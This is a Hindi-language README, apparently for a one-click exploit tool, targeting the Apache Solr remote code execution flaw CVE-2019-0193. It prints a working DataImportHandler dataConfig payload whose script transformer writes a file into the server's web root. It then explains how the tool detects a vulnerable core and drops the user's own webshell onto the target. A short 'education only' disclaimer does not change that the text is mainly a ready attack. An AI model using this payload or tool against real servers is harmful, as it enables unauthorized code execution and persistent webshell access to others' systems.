
ApacheSolrRCE (CVE-2019-0193) वन-क्लिक शेल लेखन; सिद्धांत यह है कि कोड निष्पादन के माध्यम से java फ़ाइल स्ट्रीम द्वारा ट्रोजन लिखा जाता है।
केवल सूचना सुरक्षा शिक्षा और संचार के लिए, अवैध परीक्षण और हमले के लिए उपयोग न करें।
ApacheSolrRCE (CVE-2019-0193) एक क्लिक में शेल लिखता है, सिद्धांत कोड निष्पादन के माध्यम से जावा फ़ाइल स्ट्रीम द्वारा लिखा गया शेल है।
नोट: लेखक स्वयं कमजोर है, यदि आपके पास बग या अन्य आवश्यकताएं हैं, तो कृपया कोड डाउनलोड करके स्वयं संशोधित करें।
चूंकि इंटरनेट पर प्रसारित पेलोड केवल कमांड निष्पादन के लिए हैं और वेबशेल पर जाना सुविधाजनक नहीं है, इसलिए यह पेलोड लिखा गया है (जब 123456 इको होता है, तो इसका मतलब सफल लेखन)।
नोट: उपकरण केवल परीक्षण में सहायता कर सकता है, यदि उपकरण लिखने में असमर्थ है, तो मैन्युअल रूप से लिखने की सलाह दी जाती है।
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
<script><![CDATA[
function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;
}
]]></script>
<document>
<entity
stream="true"
name="entity1"
datasource="streamsrc1"
processor="XPathEntityProcessor"
rootEntity="true"
forEach="/RDF/item"
transformer="script:poc">
<field column="title" xpath="/RDF/item/title" />
</entity>
</document>
</dataConfig>

पहले जाँच पर क्लिक करें, कोर प्राप्त करें और जाँचें कि कोई कमजोरी है या नहीं।
फिर getshell पर क्लिक करें।
नोट: अपना वेबशेल shell निर्देशिका में रखें, उपकरण स्वचालित रूप से आपके वेबशेल को ड्रॉप-डाउन सूची में लोड करेगा।

डिफ़ॉल्ट प्रॉक्सी HTTP प्रॉक्सी है, पोर्ट 8080 है, कोड में हार्डकोड किया गया है, आवश्यकता होने पर स्वयं संकलन और संशोधित करें।
